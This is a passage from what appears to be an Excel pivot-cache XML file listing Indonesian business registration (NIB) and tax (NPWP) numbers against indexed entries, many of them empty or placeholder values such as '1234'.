    <n v="123456789"/>
  </r>
  <r>
    <x v="2150"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2156"/>
    <s v="nib"/>
    <n v="9120117290834"/>
  </r>
  <r>
    <x v="332"/>
    <s v="nib"/>
    <n v="9120103450529"/>
  </r>
  <r>
    <x v="2157"/>
    <s v="nib"/>
    <n v="9120208141343"/>
  </r>
  <r>
    <x v="2158"/>
    <s v="nib"/>
    <n v="8120000800174"/>
  </r>
  <r>
    <x v="2159"/>
    <s v="nib"/>
    <n v="8120211271092"/>
  </r>
  <r>
    <x v="2159"/>
    <s v="npwp"/>
    <s v="80.437.487.4-435.000"/>
  </r>
  <r>
    <x v="2160"/>
    <s v="nib"/>
    <n v="220106163207"/>
  </r>
  <r>
    <x v="2161"/>
    <s v="nib"/>
    <n v="8120018201426"/>
  </r>
  <r>
    <x v="2162"/>
    <s v="nib"/>
    <n v="8120117122924"/>
  </r>
  <r>
    <x v="2163"/>
    <s v="nib"/>
    <n v="9120201550068"/>
  </r>
  <r>
    <x v="2164"/>
    <s v="nib"/>
    <n v="41354200194"/>
  </r>
  <r>
    <x v="2158"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2165"/>
    <s v="nib"/>
    <n v="220001341875"/>
  </r>
  <r>
    <x v="977"/>
    <s v="nib"/>
    <n v="8120002831305"/>
  </r>
  <r>
    <x v="2166"/>
    <s v="nib"/>
    <n v="220109280359"/>
  </r>
  <r>
    <x v="2039"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2167"/>
    <s v="nib"/>
    <n v="9120006631986"/>
  </r>
  <r>
    <x v="2168"/>
    <s v="nib"/>
    <n v="220000141824"/>
  </r>
  <r>
    <x v="45"/>
    <s v="nib"/>
    <n v="8120003840093"/>
  </r>
  <r>
    <x v="2169"/>
    <s v="nib"/>
    <n v="9120307960749"/>
  </r>
  <r>
    <x v="2170"/>
    <s v="nib"/>
    <n v="9120201220069"/>
  </r>
  <r>
    <x v="2171"/>
    <s v="nib"/>
    <n v="8120104811249"/>
  </r>
  <r>
    <x v="2172"/>
    <s v="nib"/>
    <n v="8120115261746"/>
  </r>
  <r>
    <x v="590"/>
    <s v="nib"/>
    <n v="8120008860172"/>
  </r>
  <r>
    <x v="704"/>
    <s v="nib"/>
    <n v="9120204882276"/>
  </r>
  <r>
    <x v="488"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2173"/>
    <s v="nib"/>
    <n v="9120303780159"/>
  </r>
  <r>
    <x v="2174"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="717"/>
    <s v="nib"/>
    <n v="9120201220069"/>
  </r>
  <r>
    <x v="2175"/>
    <s v="nib"/>
    <n v="8120016141574"/>
  </r>
  <r>
    <x v="2176"/>
    <s v="nib"/>
    <n v="8120016141574"/>
  </r>
  <r>
    <x v="2169"/>
    <s v="npwp"/>
    <s v="NPWP : 784882474-942000"/>
  </r>
  <r>
    <x v="2177"/>
    <s v="nib"/>
    <n v="9120201142256"/>
  </r>
  <r>
    <x v="551"/>
    <s v="nib"/>
    <n v="9120112051346"/>
  </r>
  <r>
    <x v="2174"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="527"/>
    <s v="nib"/>
    <n v="9120006990366"/>
  </r>
  <r>
    <x v="2178"/>
    <s v="nib"/>
    <n v="9120004541058"/>
  </r>
  <r>
    <x v="2179"/>
    <s v="nib"/>
    <n v="8120100821448"/>
  </r>
  <r>
    <x v="2180"/>
    <s v="nib"/>
    <n v="220106160937"/>
  </r>
  <r>
    <x v="2167"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2180"/>
    <s v="npwp"/>
    <s v="81.035.551.1-702.000"/>
  </r>
  <r>
    <x v="2179"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2181"/>
    <s v="nib"/>
    <n v="9120602861837"/>
  </r>
  <r>
    <x v="2178"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2182"/>
    <s v="nib"/>
    <n v="220103370656"/>
  </r>
  <r>
    <x v="2183"/>
    <s v="nib"/>
    <n v="220103370656"/>
  </r>
  <r>
    <x v="2184"/>
    <s v="nib"/>
    <n v="220103370656"/>
  </r>
  <r>
    <x v="2185"/>
    <s v="nib"/>
    <n v="220103370656"/>
  </r>
  <r>
    <x v="2186"/>
    <s v="nib"/>
    <n v="220103370656"/>
  </r>
  <r>
    <x v="2187"/>
    <s v="nib"/>
    <n v="220103370656"/>
  </r>
  <r>
    <x v="2188"/>
    <s v="nib"/>
    <n v="220008100493"/>
  </r>
  <r>
    <x v="379"/>
    <s v="nib"/>
    <n v="8120013241583"/>
  </r>
  <r>
    <x v="2189"/>
    <s v="nib"/>
    <n v="9120316230645"/>
  </r>
  <r>
    <x v="2190"/>
    <s v="nib"/>
    <n v="8120006931042"/>
  </r>
  <r>
    <x v="2191"/>
    <s v="nib"/>
    <n v="9120003971676"/>
  </r>
  <r>
    <x v="2192"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="2192"/>
    <s v="npwp"/>
    <s v="01.000.065.1-941.003"/>
  </r>
  <r>
    <x v="2193"/>
    <s v="nib"/>
    <n v="8120218013712"/>
  </r>
  <r>
    <x v="702"/>
    <s v="nib"/>
    <n v="9120009390846"/>
  </r>
  <r>
    <x v="2194"/>
    <s v="nib"/>
    <n v="220302350791"/>
  </r>
  <r>
    <x v="2195"/>
    <s v="nib"/>
    <n v="220008100493"/>
  </r>
  <r>
    <x v="727"/>
    <s v="nib"/>
    <n v="8120008931009"/>
  </r>
  <r>
    <x v="2166"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="823"/>
    <s v="nib"/>
    <n v="8120001772714"/>
  </r>
  <r>
    <x v="2193"/>
    <s v="npwp"/>
    <s v="35.522.529.3-629.000"/>
  </r>
  <r>
    <x v="2120"/>
    <s v="npwp"/>
    <s v="02.667.537.1-033.000"/>
  </r>
  <r>
    <x v="2190"/>
    <s v="npwp"/>
    <s v="84.436.106.3-617.001"/>
  </r>
  <r>
    <x v="290"/>
    <s v="nib"/>
    <n v="8120000831549"/>
  </r>
  <r>
    <x v="1331"/>
    <s v="nib"/>
    <n v="9120013121546"/>
  </r>
  <r>
    <x v="1653"/>
    <s v="nib"/>
    <n v="9120204761722"/>
  </r>
  <r>
    <x v="1653"/>
    <s v="npwp"/>
    <s v="03.022.357.2-0.24.000"/>
  </r>
  <r>
    <x v="2181"/>
    <s v="npwp"/>
    <s v="83.878.322.3-034.000"/>
  </r>
  <r>
    <x v="2117"/>
    <s v="npwp"/>
    <s v="93.549.437.7-823.000"/>
  </r>
  <r>
    <x v="643"/>
    <s v="nib"/>
    <n v="9120405201923"/>
  </r>
  <r>
    <x v="2142"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2196"/>
    <s v="nib"/>
    <n v="9120105860799"/>
  </r>
  <r>
    <x v="2197"/>
    <s v="nib"/>
    <n v="9120103173307"/>
  </r>
  <r>
    <x v="2156"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2177"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2198"/>
    <s v="nib"/>
    <n v="123456789"/>
  </r>
  <r>
    <x v="2118"/>
    <s v="npwp"/>
    <s v="31.218.606.7-903.000"/>
  </r>
  <r>
    <x v="2199"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2199"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="232"/>
    <s v="nib"/>
    <n v="9120212040038"/>
  </r>
  <r>
    <x v="1028"/>
    <s v="nib"/>
    <n v="8120108812181"/>
  </r>
  <r>
    <x v="540"/>
    <s v="nib"/>
    <n v="220000362458"/>
  </r>
  <r>
    <x v="2187"/>
    <s v="npwp"/>
    <s v="85.322.449.1449.1-915.000"/>
  </r>
  <r>
    <x v="2200"/>
    <s v="nib"/>
    <n v="9120308312379"/>
  </r>
  <r>
    <x v="2201"/>
    <s v="nib"/>
    <n v="8120114151269"/>
  </r>
  <r>
    <x v="2202"/>
    <s v="nib"/>
    <n v="9120408921502"/>
  </r>
  <r>
    <x v="2203"/>
    <s v="nib"/>
    <n v="8120110022756"/>
  </r>
  <r>
    <x v="2099"/>
    <s v="npwp"/>
    <s v="NPWP PT. SSLI"/>
  </r>
  <r>
    <x v="2204"/>
    <s v="nib"/>
    <n v="9120105512194"/>
  </r>
  <r>
    <x v="732"/>
    <s v="nib"/>
    <n v="9120200131714"/>
  </r>
  <r>
    <x v="2205"/>
    <s v="nib"/>
    <n v="220208121263"/>
  </r>
  <r>
    <x v="2206"/>
    <s v="nib"/>
    <n v="220008100493"/>
  </r>
  <r>
    <x v="2207"/>
    <s v="nib"/>
    <n v="220105230638"/>
  </r>
  <r>
    <x v="2208"/>
    <s v="nib"/>
    <n v="220103892682"/>
  </r>
  <r>
    <x v="2191"/>
    <s v="npwp"/>
    <n v="316409085834000"/>
  </r>
  <r>
    <x v="2209"/>
    <s v="nib"/>
    <n v="9120404750529"/>
  </r>
  <r>
    <x v="2210"/>
    <s v="nib"/>
    <n v="9120209131141"/>
  </r>
  <r>
    <x v="2210"/>
    <s v="npwp"/>
    <s v="02.926.684.8-926.000"/>
  </r>
  <r>
    <x v="798"/>
    <s v="nib"/>
    <n v="9120301230367"/>
  </r>
  <r>
    <x v="2111"/>
    <s v="npwp"/>
    <s v="76.453.907.8-922.000"/>
  </r>
  <r>
    <x v="493"/>
    <s v="nib"/>
    <n v="8120006890397"/>
  </r>
  <r>
    <x v="513"/>
    <s v="nib"/>
    <n v="9120114200928"/>
  </r>
  <r>
    <x v="243"/>
    <s v="nib"/>
    <n v="8120205991786"/>
  </r>
  <r>
    <x v="768"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="468"/>
    <s v="nib"/>
    <n v="8120110003808"/>
  </r>
  <r>
    <x v="2209"/>
    <s v="npwp"/>
    <s v="74.555.224.0-942.000"/>
  </r>
  <r>
    <x v="2211"/>
    <s v="nib"/>
    <n v="9120405131782"/>
  </r>
  <r>
    <x v="2212"/>
    <s v="nib"/>
    <n v="9120102350549"/>
  </r>
  <r>
    <x v="2213"/>
    <s v="nib"/>
    <n v="9120304682174"/>
  </r>
  <r>
    <x v="2214"/>
    <s v="nib"/>
    <n v="9120005831875"/>
  </r>
  <r>
    <x v="2215"/>
    <s v="nib"/>
    <n v="9120005831875"/>
  </r>
  <r>
    <x v="2216"/>
    <s v="nib"/>
    <n v="8120108801243"/>
  </r>
  <r>
    <x v="2217"/>
    <s v="nib"/>
    <n v="9120103302323"/>
  </r>
  <r>
    <x v="724"/>
    <s v="nib"/>
    <n v="8120005833413"/>
  </r>
  <r>
    <x v="2151"/>
    <s v="npwp"/>
    <s v="01.461.896.1.312.000"/>
  </r>
  <r>
    <x v="491"/>
    <s v="nib"/>
    <n v="8120310102417"/>
  </r>
  <r>
    <x v="2218"/>
    <s v="nib"/>
    <n v="9120102350549"/>
  </r>
  <r>
    <x v="2219"/>
    <s v="nib"/>
    <n v="9120102350549"/>
  </r>
  <r>
    <x v="2195"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2212"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2220"/>
    <s v="nib"/>
    <n v="220205330056"/>
  </r>
  <r>
    <x v="2221"/>
    <s v="nib"/>
    <n v="9120004400928"/>
  </r>
  <r>
    <x v="2222"/>
    <s v="nib"/>
    <n v="8120101932873"/>
  </r>
  <r>
    <x v="2223"/>
    <s v="nib"/>
    <n v="9120004400928"/>
  </r>
  <r>
    <x v="735"/>
    <s v="nib"/>
    <n v="9120004400928"/>
  </r>
  <r>
    <x v="2224"/>
    <s v="nib"/>
    <n v="9120202172782"/>
  </r>
  <r>
    <x v="2225"/>
    <s v="nib"/>
    <n v="9120202172782"/>
  </r>
  <r>
    <x v="2220"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2226"/>
    <s v="nib"/>
    <n v="220304311575"/>
  </r>
  <r>
    <x v="539"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2227"/>
    <s v="nib"/>
    <n v="8120003900213"/>
  </r>
  <r>
    <x v="2228"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2228"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2229"/>
    <s v="nib"/>
    <n v="9120502971026"/>
  </r>
  <r>
    <x v="2003"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2230"/>
    <s v="nib"/>
    <n v="9120110032534"/>
  </r>
  <r>
    <x v="2213"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2231"/>
    <s v="nib"/>
    <n v="8120217010921"/>
  </r>
  <r>
    <x v="2216"/>
    <s v="npwp"/>
    <s v="01.454.019.9-801.001"/>
  </r>
  <r>
    <x v="2123"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="406"/>
    <s v="nib"/>
    <n v="8120311291128"/>
  </r>
  <r>
    <x v="554"/>
    <s v="nib"/>
    <n v="9120207900955"/>
  </r>
  <r>
    <x v="2230"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2232"/>
    <s v="nib"/>
    <n v="9120205212067"/>
  </r>
  <r>
    <x v="637"/>
    <s v="nib"/>
    <n v="8120018162118"/>
  </r>
  <r>
    <x v="631"/>
    <s v="nib"/>
    <n v="8120115013908"/>
  </r>
  <r>
    <x v="2233"/>
    <s v="nib"/>
    <n v="220000301607"/>
  </r>
  <r>
    <x v="2232"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2234"/>
    <s v="nib"/>
    <n v="8120000821515"/>
  </r>
  <r>
    <x v="2233"/>
    <s v="npwp"/>
    <n v="945996395036000"/>
  </r>
  <r>
    <x v="2235"/>
    <s v="nib"/>
    <n v="9120310131255"/>
  </r>
  <r>
    <x v="2236"/>
    <s v="nib"/>
    <n v="9120002580915"/>
  </r>
  <r>
    <x v="2237"/>
    <s v="nib"/>
    <n v="9120000212056"/>
  </r>
  <r>
    <x v="2238"/>
    <s v="nib"/>
    <n v="9120010110054"/>
  </r>
  <r>
    <x v="2239"/>
    <s v="nib"/>
    <n v="220107231847"/>
  </r>
  <r>
    <x v="2234"/>
    <s v="npwp"/>
    <s v="01.360.591.0-007.000"/>
  </r>
  <r>
    <x v="2240"/>
    <s v="nib"/>
    <n v="8120000821515"/>
  </r>
  <r>
    <x v="2239"/>
    <s v="npwp"/>
    <n v="943561845951000"/>
  </r>
  <r>
    <x v="2241"/>
    <s v="nib"/>
    <n v="220201102644"/>
  </r>
  <r>
    <x v="2242"/>
    <s v="nib"/>
    <n v="8120115070542"/>
  </r>
  <r>
    <x v="2241"/>
    <s v="npwp"/>
    <n v="14474126627000"/>
  </r>
  <r>
    <x v="738"/>
    <s v="nib"/>
    <n v="8120216182181"/>
  </r>
  <r>
    <x v="2243"/>
    <s v="nib"/>
    <n v="8120105811555"/>
  </r>
  <r>
    <x v="2244"/>
    <s v="nib"/>
    <n v="220302380243"/>
  </r>
  <r>
    <x v="2245"/>
    <s v="nib"/>
    <n v="220302380243"/>
  </r>
  <r>
    <x v="2236"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="610"/>
    <s v="nib"/>
    <n v="9120103202307"/>
  </r>
  <r>
    <x v="2246"/>
    <s v="nib"/>
    <n v="220000100817"/>
  </r>
  <r>
    <x v="682"/>
    <s v="nib"/>
    <n v="8120217010921"/>
  </r>
  <r>
    <x v="2247"/>
    <s v="nib"/>
    <n v="220106423206"/>
  </r>
  <r>
    <x v="2248"/>
    <s v="nib"/>
    <n v="220100106423206"/>
  </r>
  <r>
    <x v="2249"/>
    <s v="nib"/>
    <n v="220100106423206"/>
  </r>
  <r>
    <x v="2250"/>
    <s v="nib"/>
    <n v="220100106423206"/>
  </r>
  <r>
    <x v="2229"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2251"/>
    <s v="nib"/>
    <n v="220001520139"/>
  </r>
  <r>
    <x v="683"/>
    <s v="nib"/>
    <n v="8120204793715"/>
  </r>
  <r>
    <x v="2252"/>
    <s v="nib"/>
    <n v="8120012010323"/>
  </r>
  <r>
    <x v="2253"/>
    <s v="nib"/>
    <n v="8120006962667"/>
  </r>
  <r>
    <x v="628"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="444"/>
    <s v="nib"/>
    <n v="220103331008"/>
  </r>
  <r>
    <x v="2254"/>
    <s v="nib"/>
    <n v="9120010110054"/>
  </r>
  <r>
    <x v="226"/>
    <s v="nib"/>
    <n v="8120001820245"/>
  </r>
  <r>
    <x v="411"/>
    <s v="nib"/>
    <n v="8120003852614"/>
  </r>
  <r>
    <x v="503"/>
    <s v="nib"/>
    <n v="9120115122269"/>
  </r>
  <r>
    <x v="347"/>
    <s v="nib"/>
    <n v="9120219012454"/>
  </r>
  <r>
    <x v="2255"/>
    <s v="nib"/>
    <n v="220204251476"/>
  </r>
  <r>
    <x v="715"/>
    <s v="nib"/>
    <n v="8120311151257"/>
  </r>
  <r>
    <x v="2196"/>
    <s v="npwp"/>
    <s v="14.675.337.1-214.000"/>
  </r>
  <r>
    <x v="684"/>
    <s v="nib"/>
    <n v="8120219252902"/>
  </r>
  <r>
    <x v="2256"/>
    <s v="nib"/>
    <n v="9120018172765"/>
  </r>
  <r>
    <x v="2257"/>
    <s v="nib"/>
    <n v="9120013040287"/>
  </r>
  <r>
    <x v="2161"/>
    <s v="npwp"/>
    <s v="03.234.880.7-022.000"/>
  </r>
  <r>
    <x v="2258"/>
    <s v="nib"/>
    <n v="9120219141494"/>
  </r>
  <r>
    <x v="2259"/>
    <s v="nib"/>
    <n v="8120006890397"/>
  </r>
  <r>
    <x v="2260"/>
    <s v="nib"/>
    <n v="9120205721752"/>
  </r>
  <r>
    <x v="2261"/>
    <s v="nib"/>
    <n v="220007462584"/>
  </r>
  <r>
    <x v="2262"/>
    <s v="nib"/>
    <n v="220007462584"/>
  </r>
  <r>
    <x v="2263"/>
    <s v="nib"/>
    <n v="220007462584"/>
  </r>
  <r>
    <x v="2264"/>
    <s v="nib"/>
    <n v="9120206981787"/>
  </r>
  <r>
    <x v="2246"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2263"/>
    <s v="npwp"/>
    <s v="94.703.405.4-604.000"/>
  </r>
  <r>
    <x v="2265"/>
    <s v="nib"/>
    <n v="8120200921691"/>
  </r>
  <r>
    <x v="2257"/>
    <s v="npwp"/>
    <s v="80.442.749.0-905.000"/>
  </r>
  <r>
    <x v="2266"/>
    <s v="nib"/>
    <n v="8120018202372"/>
  </r>
  <r>
    <x v="564"/>
    <s v="nib"/>
    <n v="9120007721943"/>
  </r>
  <r>
    <x v="487"/>
    <s v="nib"/>
    <n v="8120105811555"/>
  </r>
  <r>
    <x v="482"/>
    <s v="nib"/>
    <n v="8120004862383"/>
  </r>
  <r>
    <x v="2267"/>
    <s v="nib"/>
    <n v="8120200982643"/>
  </r>
  <r>
    <x v="641"/>
    <s v="nib"/>
    <n v="8120100982956"/>
  </r>
  <r>
    <x v="2268"/>
    <s v="nib"/>
    <n v="220106423206"/>
  </r>
  <r>
    <x v="2269"/>
    <s v="nib"/>
    <n v="9120402201558"/>
  </r>
  <r>
    <x v="624"/>
    <s v="nib"/>
    <n v="8120200982643"/>
  </r>
  <r>
    <x v="741"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2266"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="694"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2256"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2270"/>
    <s v="nib"/>
    <n v="220101441776"/>
  </r>
  <r>
    <x v="46"/>
    <s v="nib"/>
    <n v="9120206981787"/>
  </r>
  <r>
    <x v="710"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2205"/>
    <s v="npwp"/>
    <s v="94.013.156.8-627.000"/>
  </r>
  <r>
    <x v="2271"/>
    <s v="nib"/>
    <n v="220003292344"/>
  </r>
  <r>
    <x v="2271"/>
    <s v="npwp"/>
    <n v="941952491915000"/>
  </r>
  <r>
    <x v="2272"/>
    <s v="nib"/>
    <n v="8120017221293"/>
  </r>
  <r>
    <x v="2273"/>
    <s v="nib"/>
    <n v="220105463303"/>
  </r>
  <r>
    <x v="2274"/>
    <s v="nib"/>
    <n v="220101441776"/>
  </r>
  <r>
    <x v="2275"/>
    <s v="nib"/>
    <n v="9120111140546"/>
  </r>
  <r>
    <x v="2276"/>
    <s v="nib"/>
    <n v="220101441776"/>
  </r>
  <r>
    <x v="450"/>
    <s v="nib"/>
    <n v="8120208752455"/>
  </r>
  <r>
    <x v="2277"/>
    <s v="nib"/>
    <n v="220200260031"/>
  </r>
  <r>
    <x v="586"/>
    <s v="nib"/>
    <n v="8120002821618"/>
  </r>
  <r>
    <x v="2278"/>
    <s v="nib"/>
    <n v="220000572024"/>
  </r>
  <r>
    <x v="2279"/>
    <s v="nib"/>
    <n v="8120006890397"/>
  </r>
  <r>
    <x v="2280"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2281"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2282"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2283"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2284"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2285"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2286"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2287"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2288"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2289"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2290"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2291"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2292"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2293"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2294"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2295"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2296"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2297"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2298"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2299"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2300"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2301"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2302"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2303"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2304"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2305"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2306"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2307"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2308"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2309"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2310"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2311"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2312"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2313"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2314"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2315"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2316"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2317"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2278"/>
    <s v="npwp"/>
    <s v="76.282.196.5-216.000"/>
  </r>
  <r>
    <x v="2318"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2319"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2320"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2321"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2322"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2323"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2324"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2325"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2326"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2327"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2328"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2329"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2330"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2331"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2332"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2333"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2334"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2335"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2336"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2337"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2338"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2339"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2340"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2341"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2342"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2343"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2344"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2345"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2346"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2347"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2348"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2349"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2350"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2351"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2352"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2353"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2354"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2355"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2356"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2357"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2358"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2359"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2360"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2361"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2362"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2363"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2364"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2365"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2366"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2367"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2368"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2369"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2370"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2371"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2372"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2373"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2374"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2375"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2376"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="2377"/>
    <s v="nib"/>
    <n v="1234"/>
